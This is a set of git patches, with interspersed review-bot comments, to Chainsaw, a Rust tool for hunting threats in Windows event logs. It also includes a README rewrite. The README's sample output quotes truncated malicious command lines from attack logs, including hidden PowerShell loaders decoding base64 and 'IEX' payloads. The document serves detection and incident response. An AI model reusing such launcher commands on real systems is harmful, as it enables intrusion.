@@ -509,16 +545,46 @@ fn run() -> Result<()> { std::env::current_dir().expect("could not get current working directory"), ); } + let types = if let Some(e) = &extension { + Some(HashSet::from_iter(e.clone())) + } else { + None + }; + let mut files = vec![]; let mut size = ByteSize::mb(0); for path in &paths { - let res = get_files(path, &extension, skip_errors)?; + let res = get_files(path, &types, skip_errors)?; for i in &res { size += i.metadata()?.len(); } files.extend(res); } + if let Some(ext) = &extension { + cs_eprintln!( + "[+] Loading event logs from: {} (extensions: {})", + paths + .iter() + .map(|p| p.display().to_string()) + .collect::>() + .join(", "), + ext.iter() + .map(|x| format!(".{}", x)) + .collect::>() + .join(", ") + ) + } else { + cs_eprintln!( + "[+] Loading event logs from: {}", + paths + .iter() + .map(|p| p.display().to_string()) + .collect::>() + .join(", "), + ) + }; + if files.is_empty() { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 4f972978..68da2ccf 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,3 +1,4 @@ +use crate::file::Kind as FileKind; use std::collections::HashSet; use std::fmt; use std::path::Path; @@ -50,6 +51,14 @@ impl Rule { } } + #[inline] + pub fn types(&self) -> &FileKind { + match self { + Self::Chainsaw(c) => &c.kind, + Self::Sigma(_) => &FileKind::Unknown, + } + } + #[inline] pub fn name(&self) -> &String { match self { From dac08f1f403fbdc94c39e58be66518e98cfbfd58 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 20:09:27 +0100 Subject: [PATCH 51/77] refactor: clean up some inconsistencies --- src/hunt.rs | 21 +++++++++++---------- src/rule/mod.rs | 3 ++- 2 files changed, 13 insertions(+), 11 deletions(-) diff --git a/src/hunt.rs b/src/hunt.rs index 48752926..68521e58 100644 --- a/src/hunt.rs +++ b/src/hunt.rs 
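Review bot: The two `cs_eprintln!` branches at the end of the search hunk repeat the path-list formatting and differ only in the ` (extensions: …)` suffix; building the joined path string once and appending the suffix when `extension` is `Some` would halve the block. `types` is the raw `extension` vector copied into a `HashSet`, so unlike the hunt path it is not normalised and, presumably, the same case and leading-dot caveats apply when `get_files` compares it against on-disk names. `run` starts and ends outside this hunk.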
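Review bot: `Rule::types` returns a single `&FileKind`, so the plural name misleads and does not match the `kind` field it reads from chainsaw rules; `kind()` or `file_kind()` would read better. It is also worth a doc line that sigma rules always answer `FileKind::Unknown`, because `Hunter::extensions` in the `src/hunt.rs` hunk above derives nothing from them and a sigma-only run therefore relies entirely on the mapping's `file` kind: `/// File kind this rule applies to; sigma rules carry none and report Unknown.`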
@@ -359,8 +359,8 @@ impl Hunt { } pub struct HunterInner { - pub hunts: Vec, - pub rules: BTreeMap, + hunts: Vec, + rules: BTreeMap, load_unknown: bool, local: bool, @@ -371,7 +371,7 @@ pub struct HunterInner { } pub struct Hunter { - pub inner: HunterInner, + inner: HunterInner, } impl Hunter { @@ -600,13 +600,6 @@ impl Hunter { Ok(detections) } - pub fn hunts(&self) -> &Vec { - &self.inner.hunts - } - - pub fn rules(&self) -> &BTreeMap { - &self.inner.rules - } pub fn extensions(&self) -> HashSet { let mut extensions = HashSet::new(); for rule in &self.inner.rules { @@ -622,6 +615,14 @@ impl Hunter { extensions } + pub fn hunts(&self) -> &Vec { + &self.inner.hunts + } + + pub fn rules(&self) -> &BTreeMap { + &self.inner.rules + } + fn skip(&self, timestamp: NaiveDateTime) -> crate::Result { if self.inner.from.is_some() || self.inner.to.is_some() { // TODO: Not sure if this is correct... diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 68da2ccf..cdc0d52e 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,4 +1,3 @@ -use crate::file::Kind as FileKind; use std::collections::HashSet; use std::fmt; use std::path::Path; @@ -14,6 +13,8 @@ use tau_engine::{ Document, }; +use crate::file::Kind as FileKind; + pub use self::chainsaw::Rule as Chainsaw; pub use self::sigma::Rule as Sigma; From 7fbfbf04e8e0be29d802bdee815c1f98882f235e Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 20:20:16 +0100 Subject: [PATCH 52/77] fix: load unknown was not handled correctly in file reader --- src/file/mod.rs | 21 ++++++++++++++++++--- 1 file changed, 18 insertions(+), 3 deletions(-) diff --git a/src/file/mod.rs b/src/file/mod.rs index 22fa7349..ff3c3588 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs 
@@ -88,6 +88,19 @@ impl Reader { }), _ => { if load_unknown { + if let Ok(parser) = EvtxParser::load(file) { + return Ok(Self { + parser: Parser::Evtx(parser), + }); + } else if let Ok(parser) = JsonParser::load(file) { + return Ok(Self { + parser: Parser::Json(parser), + }); + } else if let Ok(parser) = XmlParser::load(file) { + return Ok(Self { + parser: Parser::Xml(parser), + }); + } if skip_errors { cs_eyellowln!( "file type is not currently supported - {}", @@ -98,7 +111,7 @@ impl Reader { }) } else { anyhow::bail!( - "file type is not currently supported - {}, use --skip-errors to continue", + "file type is not currently supported - {}, use --skip-errors to continue...", file.display() ) } @@ -126,12 +139,14 @@ impl Reader { } if skip_errors { cs_eyellowln!("file type is not known - {}", file.display()); - Ok(Self { parser: Parser::Unknown, }) } else { - anyhow::bail!("file type is not known - {}", file.display()) + anyhow::bail!( + "file type is not known - {}, use --skip-errors to continue...", + file.display() + ) } } else { Ok(Self { From f124c82b0848ff25d2ed96dc41c9a77de6f7d18e Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 20:27:09 +0100 Subject: [PATCH 53/77] tweak: set groups to true for aggregates so we don't miss data Due to how mappings work we can't easily tell without a lot of preprocessing what is an aggregation rule and what is not plus we would then be inconsistent. So now we default that to true. --- src/cli.rs | 1 - src/hunt.rs | 6 +++--- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 086d96f7..a6bacb2d 100644 --- a/src/cli.rs +++ b/src/cli.rs 
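Review bot: The `load_unknown` branch now hands a file to `EvtxParser`, `JsonParser` and `XmlParser` in turn with no comment on the order or on the fact that a file is opened up to three times before it is declared unsupported; `// Unknown extension: sniff the content by trying each parser in order, first one that loads wins` above the chain would document the intent. Because this runs for every file the user asked to include regardless of extension, the `--load-unknown` help text could also mention that each such file is parsed by every format in turn, which is noticeably slower on large directories. The enclosing `impl Reader` method starts and ends outside this hunk.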
@@ -141,7 +141,6 @@ pub fn print_detections( .entry(&hunt.group) .or_insert((vec![], HashSet::new())); // NOTE: We only support count in aggs atm so we can inject that value in...! - // NOTE: This will not work for sigma based aggs... if hunt.is_aggregation() { (*headers).0.push("count".to_owned()); (*headers).1.insert("count".to_owned()); diff --git a/src/hunt.rs b/src/hunt.rs index 68521e58..90a573d8 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -351,10 +351,10 @@ pub struct Hunt { impl Hunt { pub fn is_aggregation(&self) -> bool { - if let HuntKind::Rule { aggregate, .. } = &self.kind { - return aggregate.is_some(); + match &self.kind { + HuntKind::Group { .. } => true, + HuntKind::Rule { aggregate, .. } => aggregate.is_some(), } - false } } From 050feca023548c280f406d86a1d3ed8cfc708e20 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 20:32:49 +0100 Subject: [PATCH 54/77] feat: add rule kind to metadata output --- src/cli.rs | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/cli.rs b/src/cli.rs index a6bacb2d..89493edc 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -308,6 +308,7 @@ pub fn print_detections( if metadata { let mut table = Table::new(); table.add_row(Row::new(vec![ + cell!("").style_spec("c"), cell!("name").style_spec("c"), cell!("authors").style_spec("c"), cell!("level").style_spec("c"), @@ -317,6 +318,7 @@ pub fn print_detections( match rule { Rule::Chainsaw(c) => { table.add_row(Row::new(vec![ + cell!('c'), cell!(split_tag(&c.name)), cell!(c.authors.join("\n")), cell!(c.level), @@ -325,6 +327,7 @@ pub fn print_detections( } Rule::Sigma(s) => { table.add_row(Row::new(vec![ + cell!('σ'), cell!(split_tag(&s.name)), cell!(s.authors.join("\n")), cell!(s.level), From 3cbc160fca3a92809f3d1b66037f2bb4d4c2f052 Mon Sep 17 00:00:00 2001 
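Review bot: The new `HuntKind::Group { .. } => true` arm makes every group count as an aggregation, but the reason lives only in the commit message, so the next reader will take it for an over-approximation; a comment above the arm should carry it, e.g. `// Groups are always treated as aggregations: the mappings give no cheap way to tell aggregating rules apart, so defaulting to true avoids dropping data.`. Callers such as `print_detections` push a `count` column whenever this returns true, so the change widens the tabular output for all groups; that matches the commit's intent but is worth a second sentence in the same comment.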
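Review bot: The new first column's header is `cell!("")`, so the `c`/`σ` markers in the rows carry no label, and nothing in the hunk says what the two glyphs mean; `cell!("kind").style_spec("c")` for the header, plus a `// c = Chainsaw rule, σ = Sigma rule` comment above the `match rule`, would make the table self-describing. The same two glyphs are emitted again as string literals by `print_log` elsewhere on this page, so a small helper on `Rule` returning the glyph would keep the two outputs from drifting.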
From: Alex Kornitzer Date: Tue, 5 Jul 2022 21:29:35 +0100 Subject: [PATCH 55/77] feat: add log like output option --- src/cli.rs | 106 ++++++++++++++++++++++++++++++++++++++++++++++++++++ src/main.rs | 6 +++ 2 files changed, 112 insertions(+) diff --git a/src/cli.rs b/src/cli.rs index 89493edc..da43b9a9 100644 --- a/src/cli.rs +++ b/src/cli.rs 
@@ -106,6 +106,112 @@ pub struct Hit<'a> { rule: &'a Rule, } +pub fn print_log( + detections: &[Detections], + hunts: &[Hunt], + rules: &BTreeMap, + local: bool, + timezone: Option, +) -> crate::Result<()> { + let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); + let mut rule_width = 1; + for rule in rules.values() { + let width = rule.name().len(); + if width > rule_width { + rule_width = width; + } + } + + let mut rows = vec![]; + for detection in detections { + for hit in &detection.hits { + rows.push((hit, &detection.kind)); + } + } + rows.sort_by(|x, y| x.0.timestamp.cmp(&y.0.timestamp)); + for (hit, kind) in rows { + let hunt = &hunts.get(&hit.hunt).expect("could not get hunt"); + let rule = &rules.get(&hit.rule).expect("could not get rule"); + let mut columns = vec![]; + + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(&hit.timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(&hit.timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(hit.timestamp, Utc).to_rfc3339() + }; + columns.push(localised.to_string()); + + let count; + let document = match kind { + Kind::Individual { document } => { + count = 1; + document + } + Kind::Aggregate { documents } => { + count = documents.len(); + documents.first().expect("could not get document") + } + }; + + let name = match rule { + Rule::Chainsaw(rule) => { + columns.push("c".to_string()); + &rule.name + } + Rule::Sigma(rule) => { + columns.push("σ".to_string()); + &rule.name + } + }; + //columns.push(format!("{: 6}", count)); + columns.push(name.to_string()); + columns.push(format!("{}", count)); + + let mut values = vec![]; + for field in hunt.mapper.fields() { + if field.visible { + let wrapper; + let mapped = match &document.kind { + FileKind::Evtx => { + wrapper = crate::evtx::Wrapper(&document.data); + 
hunt.mapper.mapped(&wrapper) + } + FileKind::Json | FileKind::Xml => hunt.mapper.mapped(&document.data), + FileKind::Unknown => continue, + }; + let fields: HashMap<_, _> = + hunt.mapper.fields().iter().map(|f| (&f.name, f)).collect(); + if let Some(field) = fields.get(&field.name) { + if let Some(value) = mapped.find(&field.from) { + match value.to_string() { + Some(v) => { + values.push(v); + } + None => { + values.push("".to_string()); + } + } + } + } + } + } + columns.push(values.join(" :: ")); + + println!("{}", columns.join(" | ")); + } + Ok(()) +} + pub fn print_detections( detections: &[Detections], hunts: &[Hunt], diff --git a/src/main.rs b/src/main.rs index 6832b230..540bb1a4 100644 --- a/src/main.rs +++ b/src/main.rs @@ -83,6 +83,9 @@ enum Command { /// The file/directory to output to. #[structopt(short = "o", long = "output")] output: Option, + /// Print the output in log like format. + #[structopt(group = "format", long = "log")] + log: bool, /// Supress informational output. #[structopt(short = "q")] quiet: bool, @@ -244,6 +247,7 @@ fn run() -> Result<()> { local, metadata, output, + log, quiet, sigma, skip_errors, @@ -428,6 +432,8 @@ fn run() -> Result<()> { cli::print_csv(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else if json { cli::print_json(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; + } else if log { + cli::print_log(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else { cli::print_detections( &detections, From bfae57f0f430d793cefcf45fa1d73a9169587601 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 21:30:03 +0100 Subject: [PATCH 56/77] tweak: flatten sigma output in json format --- src/cli.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/cli.rs b/src/cli.rs index da43b9a9..dc88a06e 100644 --- a/src/cli.rs +++ b/src/cli.rs 
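Review bot: In the `timezone` branch, `.single().expect("failed to localise timestamp")` aborts the whole run for any hit whose naive timestamp is ambiguous or non-existent in that zone (a DST transition), which can occur in real event logs; `.earliest()` (or turning `None` into an error for that hit) avoids the panic. The per-field loop rebuilds a `HashMap` of `hunt.mapper.fields()` only to look up the `field` it is already iterating, so unless field names can repeat the inner lookup is redundant and `if let Some(value) = mapped.find(&field.from) { values.push(value.to_string().unwrap_or_default()); }` is equivalent. `rule_width` is computed from every rule name and never read, and the commented-out `columns.push(format!("{: 6}", count))` line should go with it. Values are joined with `" :: "` and columns with `" | "` without escaping, so a field value containing a newline or either separator (command lines and file names often do) will split or mis-align a record for anything consuming the output line by line; either escape them or state the limitation in the `--log` help text.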
@@ -668,7 +668,7 @@ pub struct Detection<'a> { pub source: RuleKind, pub status: &'a Status, - #[serde(skip_serializing_if = "Option::is_none")] + #[serde(flatten, skip_serializing_if = "Option::is_none")] pub sigma: Option>, } From 63bc7e12d929a9bac5257b6c17891303a1d51938 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Tue, 5 Jul 2022 22:19:21 +0100 Subject: [PATCH 57/77] refactor: simplifying extension parsing logic for search --- src/main.rs | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/src/main.rs b/src/main.rs index 540bb1a4..0e4344f9 100644 --- a/src/main.rs +++ b/src/main.rs @@ -551,12 +551,8 @@ fn run() -> Result<()> { std::env::current_dir().expect("could not get current working directory"), ); } - let types = if let Some(e) = &extension { - Some(HashSet::from_iter(e.clone())) - } else { - None - }; + let types = extension.as_ref().map(|e| HashSet::from_iter(e.clone())); let mut files = vec![]; let mut size = ByteSize::mb(0); for path in &paths { From 0d28a635e23e3de0a29ffadd5306d7c3cea6c5c5 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Tue, 5 Jul 2022 22:44:49 +0100 Subject: [PATCH 58/77] docs: building out README and help output for v2 release --- README.md | 834 +++++++--------------------- chainsaw.png => images/chainsaw.png | Bin src/main.rs | 34 +- 3 files changed, 212 insertions(+), 656 deletions(-) rename chainsaw.png => images/chainsaw.png (100%) diff --git a/README.md b/README.md index daea41c8..342a5992 100644 --- a/README.md +++ b/README.md @@ -4,26 +4,119 @@ Rapidly Search and Hunt through Windows Event Logs

- + --- -Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules. +Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules. ## Features ---- - - :mag: Search and extract event log records by event IDs, string matching, and regex patterns - - :dart: Hunt for threats using [Sigma](https://github.com/SigmaHQ/sigma) detection rules and custom built-in detection logic + - :dart: Hunt for threats using [Sigma](https://github.com/SigmaHQ/sigma) detection rules and custom Chainsaw detection rules + - :mag: Search and extract event log records by string matching, and regex patterns - :zap: Lightning fast, written in rust, wrapping the [EVTX parser](https://github.com/omerbenamram/evtx) library by [@OBenamram](https://twitter.com/obenamram?lang=en) + - :feather: Clean and lightweight execution and output formats without unnecessary bloat - :fire: Document tagging (detection logic matching) provided by the [TAU Engine](https://github.com/countercept/tau-engine) Library - - :bookmark_tabs: Output in an ASCII table format, CSV format, or JSON format + - :bookmark_tabs: Output results in a variety of formats, such as ASCII table format, CSV format, and JSON format + - :computer: Can be run on MacOS, Linux and Windows +--- + $ ./chainsaw hunt evtx_attack_samples -s sigma_rules --mapping mappings/sigma-event-logs.yml --level critical + + ██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗ + ██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ + ██║ ███████║███████║██║██╔██╗ 
██║███████╗███████║██║ █╗ ██║ + ██║ ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║ + ╚██████╗██║ ██║██║ ██║██║██║ ╚████║███████║██║ ██║╚███╔███╔╝ + ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝ + By F-Secure Countercept (@FranticTyping, @AlexKornitzer) + + [+] Loading detection rules from: sigma_rules + [+] Loaded 169 detection rules (338 not loaded) + [+] Loading event logs from: evtx_attack_samples (extensions: .evtx) + [+] Loaded 268 EVTX files (37.5 MB) + [+] Hunting: [========================================] 268/268 + + [+] Group: Suspicious File Creation + ┌─────────────────────┬───────────────────────────────┬───────┬──────────────────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐ + │ timestamp │ detections │ count │ Computer │ Image │ Target File Name │ + ├─────────────────────┼───────────────────────────────┼───────┼──────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2019-06-21 07:35:37 │ ‣ Dumpert Process Dumper │ 1 │ alice.insecurebank.local │ C:\Users\administrator\Desktop\x64\Outfl │ C:\Windows\Temp\dumpert.dmp │ + │ │ │ │ │ ank-Dumpert.exe │ │ + ├─────────────────────┼───────────────────────────────┼───────┼──────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2020-08-12 13:04:27 │ ‣ CVE-2021-1675 Print Spooler │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\spoolsv.exe │ C:\Windows\System32\spool\drivers\x64\3\ │ + │ │ Exploitation Filename │ │ │ │ New\STDSCHMX.GDL │ + │ │ Pattern │ │ │ │ │ + └─────────────────────┴───────────────────────────────┴───────┴──────────────────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘ + + [+] Group: Suspicious Process Creation + 
┌─────────────────────┬───────────────────────────────┬───────┬─────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐ + │ timestamp │ detections │ count │ Computer │ Image │ Command Line │ Parent Command Line │ + ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2019-04-30 20:26:52 │ ‣ Encoded FromBase64String │ 1 │ IEWIN7 │ C:\Windows\System32\WindowsPowerShell\v1 │ powershell.exe -nop -w hidden -noni -c " │ C:\Windows\system32\cmd.exe /b /c start │ + │ │ │ │ │ .0\powershell.exe │ if([IntPtr]::Size -eq 4){$b='powershell. │ /b /min powershell.exe -nop -w hidden -n │ + │ │ │ │ │ │ exe'}else{$b=$env:windir+'\syswow64\Wind │ oni -c "if([IntPtr]::Size -eq 4){$b='pow │ + │ │ │ │ │ │ owsPowerShell\v1.0\powershell.exe'};$s=N │ ershell.exe'}else{$b=$env:windir+'\syswo │ + │ │ │ │ │ │ ew-Object System.Diagnostics.ProcessStar │ w64\WindowsPowerShell\v1.0\powershell.ex │ + │ │ │ │ │ │ tInfo;$s.FileName=$b;$s.Arguments='-noni │ e'};$s=New-Object System.Diagnostics.Pro │ + │ │ │ │ │ │ -nop -w hidden -c &([scriptblock]::crea │ cessStartInfo;$s.FileName=$b;$s.Argument │ + │ │ │ │ │ │ IO.MemoryStream(,[Convert]::FromBase64St │ ew-Object IO.Compression.GzipStream((New │ + │ │ │ │ │ │ ring(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVE │ -Object IO.MemoryStream(,[Convert]::From │ + │ │ │ │ │ │ rZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/ │ Base64String(''H4sIAIuvyFwCA7VW+2/aSBD+O │ + │ │ │ │ │ │ u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2Dx │ ZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0la │ + │ │ │ │ │ │ Crl3Gbhx9ZapgqKf... │ yP6kiEwOpsexgQCk... 
│ + │ │ │ │ │ │ │ │ + │ │ │ │ │ │ (use --full to show all content) │ (use --full to show all content) │ + ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2019-08-14 12:17:14 │ ‣ Encoded FromBase64String │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\wscript.exe │ "c:\windows\system32\wscript.exe" /E:vbs │ "C:\Windows\system32\rundll32.exe" zipfl │ + │ │ ‣ Encoded IEX │ │ │ │ c:\windows\temp\icon.ico "powershell -e │ dr.dll,RouteTheCall shell:::{769f9427-3c │ + │ │ │ │ │ │ xec bypass -c ""IEX ([System.Text.Encodi │ c6-4b62-be14-2a705115b7ab} │ + │ │ │ │ │ │ ng]::ASCII.GetString([System.Convert]::F │ │ + │ │ │ │ │ │ romBase64String('JFhYPUlFWCgoJ1snICsgW2N │ │ + │ │ │ │ │ │ dOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNic │ │ + │ │ │ │ │ │ gKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDU │ │ + │ │ │ │ │ │ zICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZ │ │ + │ │ │ │ │ │ mICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyB │ │ + │ │ │ │ │ │ 7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1 │ │ + │ │ │ │ │ │ bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHY │ │ + │ │ │ │ │ │ vMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnN │ │ + │ │ │ │ │ │ lKCRkKTtJRVgoWyc... 
│ │ + │ │ │ │ │ │ │ │ + │ │ │ │ │ │ (use --full to show all content) │ │ + ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2019-11-03 13:51:58 │ ‣ Suspicious Shells Spawn │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\cmd.exe │ "C:\Windows\system32\cmd.exe" /c set > c │ "c:\Program Files\Microsoft SQL Server\M │ + │ │ by SQL Server │ │ │ │ :\users\\public\netstat.txt │ SSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.ex │ + │ │ │ │ │ │ │ e" -sSQLEXPRESS │ + ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2020-10-20 22:33:02 │ ‣ Trickbot Malware Activity │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\wermgr.exe │ C:\Windows\system32\wermgr.exe │ rundll32.exe c:\temp\winfire.dll,DllRegi │ + │ │ │ │ │ │ │ sterServer │ + └─────────────────────┴───────────────────────────────┴───────┴─────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘ + +## Table Of Contents + +- [Features](#features) +- [Why Chainsaw?](#why-chainsaw) +- [Quick Start Guide](#quick-start-guide) + - [Downloading and Running](#downloading-and-running) + - [EDR and AV Warnings](#edr-and-av-warnings) +- [Examples](#examples) + - [Searching](#searching) + - [Hunting](#hunting) +- [Acknowledgements](#acknowledgements) + +Extended information can be found in the Wiki for this tool: https://github.com/countercept/chainsaw/wiki + +## Why Chainsaw? + +Windows event logs provide a rich source of forensic information for threat hunting and incident response investigations. 
Unfortunately, processing and searching through event logs can be a slow and time-consuming process, and in most cases requires the overhead of surrounding infrastructure – such as an ELK stack or Splunk instance – to hunt efficiently through the log data and apply detection logic. This overhead often means that blue teams are unable to quickly triage Windows event logs to provide the direction and conclusions required to progress their investigations. + +At WithSecure Countercept, we ingest a wide range of telemetry sources from endpoints via our EDR agent to provide our managed detection and response service. However, there are circumstances where we need to quickly analyze event log data that hasn’t been captured by our EDR, a common example being incident response investigations on an estate where our EDR wasn’t installed at the time of the compromise. Chainsaw was created to provide our threat hunters and incident response consultants with a tool to perform rapid triage of Windows event logs in these circumstances. + +At the time of writing, there are very few open-source, standalone tools that provide a simple and fast method of triaging Windows event logs, identifying interesting elements within the logs and applying a detection logic rule format (such as Sigma) to detect signs of malicious activity. In our testing, the tools that did exist struggled to efficiently apply detection logic to large volumes of event logs making them unsuitable for scenarios where quick triage is required. ## Hunting Logic ---- ### Sigma Rule Matching -Using the `--rules` and `--mapping` parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw what event IDs to run the detection rules against, and what fields are relevant. 
By default the following event IDs are supported: +Using the `--sigma` and `--mapping` parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw what event IDs to run the detection rules against, and what fields are relevant. By default the following event IDs are supported: |Event Type|Event ID | |--|--| 
@@ -37,19 +130,19 @@ Using the `--rules` and `--mapping` parameters you can specify a directory conta |Scheduled Task Creation|4698| |Service Creation|7045| -### Built-In Logic +### Chainsaw Detection Rules +In addition to supporting sigma rules, Chainsaw also supports a custom rule format. In the repository you will find a `rules` directory that contains various Chainsaw rules that allows users to: - 1. Extraction and parsing of Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts - 2. Detection of key event logs being cleared, or the event log service being stopped + 1. Extract and parse Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts + 2. Detect key event logs being cleared, or the event log service being stopped 3. Users being created or added to sensitive user groups - 4. Brute-force of local user accounts - 5. RDP Logins + 4. Remote Logins (Service, RDP, Network etc.) events. This helps hunters to identify sources of lateral movement + 5. Brute-force of local user accounts -You can specify the `--lateral-all` flag to chainsaw to also parse and extract additional 4624 logon types (network logons, service, batch etc.) relating to potential lateral movement that may be interesting for investigations. -## Getting Started ---- -You can find pre-compiled versions of chainsaw in the releases section of this Github repo, or you can clone the repo (and the submodules) by running: +## Quick Start Guide +### Downloading and Running +You can find pre-compiled versions of chainsaw in the [releases section](https://github.com/countercept/chainsaw/releases) of this Github repo, or you can clone the repo (and the submodules) by running: `git clone --recurse-submodules https://github.com/countercept/chainsaw.git` You can then compile the code yourself by running: `cargo build --release`. Once the build has finished, you will find a copy of the compiled binary in the target/release folder. 
@@ -58,661 +151,110 @@ You can then compile the code yourself by running: `cargo build --release`. Onc If you want to quickly see what Chainsaw looks like when it runs, you can use the command: ``` -./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml +./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml ``` +### EDR and AV Warnings +When downloading and running chainsaw you may find that your local EDR / AntiVirus engine detects Chainsaw as malicious. You can see examples of this in the following Github issues: [Example1](https://github.com/countercept/chainsaw/issues/12), [Example2](https://github.com/countercept/chainsaw/issues/47). +These warnings are typically due to the example event logs and/or Sigma rules which contain references to malicious strings (e.g. "mimikatz"). We have also seen instances where the Chainsaw binary has been detected by a small subset of Anti-Virus engines likely due to some form of heuristics detection. ## Examples ---- ### Searching + USAGE: + chainsaw search [FLAGS] [OPTIONS] [--] [path]... + + FLAGS: + -h, --help Prints help information + -i, --ignore-case Ignore the case when searching patterns + --json Print the output in json format + --load-unknown Allow chainsaw to try and load files it cannot identify + --local Output the timestamp using the local machine's timestamp + -q Supress informational output + --skip-errors Continue to search when an error is encountered + -V, --version Prints version information + + OPTIONS: + --extension ... Only search through files with the provided extension + --from The timestamp to search from. Drops any documents older than the value provided + -o, --output The file to output to + -e, --regexp ... A regular expressions (RegEx) pattern to search for + -t, --tau ... 
Tau expressions to search with + --timestamp The field that contains the timestamp + --timezone Output the timestamp using the timezone provided + --to The timestamp to search up to. Drops any documents newer than the value provided + + ARGS: + A pattern to search for + ... The paths containing event logs to load and hunt through + #### Command Examples - *Search all .evtx files in the evtx_files dir for event id 4624* + *Search all .evtx files for the case-insensitive string "mimikatz"* - ./chainsaw search ~/Downloads/evtx_files/ -e 4624 + ./chainsaw search mimikatz -i evtx_attack_samples/ - *Search a specific evtx log for logon events containing the string "bob" (case insensitive)* + *Search all .evtx files for powershell script block events (Event ID 4014) - ./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -s "bob" -i + ./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/ *Search a specific evtx log for logon events, with a matching regex pattern, output in JSON format* - ./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -r "bob[a-zA-Z]" --json + ./chainsaw search -e "DC[0-9].insecurebank.local" evtx_attack_samples --json ### Hunting + USAGE: + chainsaw hunt [FLAGS] [OPTIONS] [--] [path]... + + FLAGS: + --csv Print the output in csv format + --full Print the full values for the tabular output + -h, --help Prints help information + --json Print the output in json format + --load-unknown Allow chainsaw to try and load files it cannot identify + --local Output the timestamp using the local machine's timestamp + --log Print the output in log like format + --metadata Display additional metadata in the tablar output + -q Supress informational output + --skip-errors Continue to hunt when an error is encountered + -V, --version Prints version information + + 